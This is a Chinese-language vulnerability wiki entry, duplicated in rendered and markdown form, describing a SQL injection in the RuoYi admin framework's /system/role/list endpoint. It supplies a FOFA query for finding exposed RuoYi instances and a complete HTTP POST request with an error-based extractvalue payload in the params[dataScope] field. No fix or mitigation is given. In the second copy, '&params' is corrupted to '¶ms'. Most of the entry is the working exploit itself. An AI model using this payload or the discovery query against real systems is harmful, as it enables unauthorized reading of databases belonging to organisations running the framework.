fofamini-wiki

登录白背景

源码

若依快速开发框架list存在sql注入漏洞

一、漏洞简介

ruoyi是一套基于java开发的轻量级开源快速开发框架，采用Spring Boot+Spring Security+MybatisPlus框架技术。ruoyi框架内部采用分模块设计，代码清晰简单易于维护，同时提供多种组件，如代码生成、前后端分离、数据权限管理等，可以快速开发出完整的项目。若依快速开发框架list存在sql注入漏洞

二、影响版本

ruoyi

三、资产测绘

app="若依-管理系统"

四、漏洞复现

POST /system/role/list HTTP/1.1
Cookie: b-user-id=3fb562ab-372b-aaaf-344c-b2749df5a18e; JSESSIONID=0c074950-06a0-4f68-b7d5-9d1bc33d22bf
Host: 
Content-Length: 179
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36

pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))

原文: https://www.yuque.com/xiaokp7/ocvun2/puw3tx7dxg0dgxyp

# 若依快速开发框架list存在sql注入漏洞

# 一、漏洞简介
ruoyi是一套基于java开发的轻量级开源快速开发框架，采用Spring Boot+Spring Security+MybatisPlus框架技术。ruoyi框架内部采用分模块设计，代码清晰简单易于维护，同时提供多种组件，如代码生成、前后端分离、数据权限管理等，可以快速开发出完整的项目。若依快速开发框架list存在sql注入漏洞

# 二、影响版本
+ ruoyi

# 三、资产测绘
```plain
app="若依-管理系统"
```

![1721639324402-8114ae2f-0e23-4dff-b4a8-c3e488a0f08f.png](./img/4FjQlFk4_dBSrISo/1721639324402-8114ae2f-0e23-4dff-b4a8-c3e488a0f08f-462431.png)

# 四、漏洞复现
```http
POST /system/role/list HTTP/1.1
Cookie: b-user-id=3fb562ab-372b-aaaf-344c-b2749df5a18e; JSESSIONID=0c074950-06a0-4f68-b7d5-9d1bc33d22bf
Host: 
Content-Length: 179
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36

pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms[beginTime]=¶ms[endTime]=¶ms[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
```

![1721641841507-ab60fa01-3a39-429e-9cd2-914040f3dbed.png](./img/4FjQlFk4_dBSrISo/1721641841507-ab60fa01-3a39-429e-9cd2-914040f3dbed-467464.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/puw3tx7dxg0dgxyp>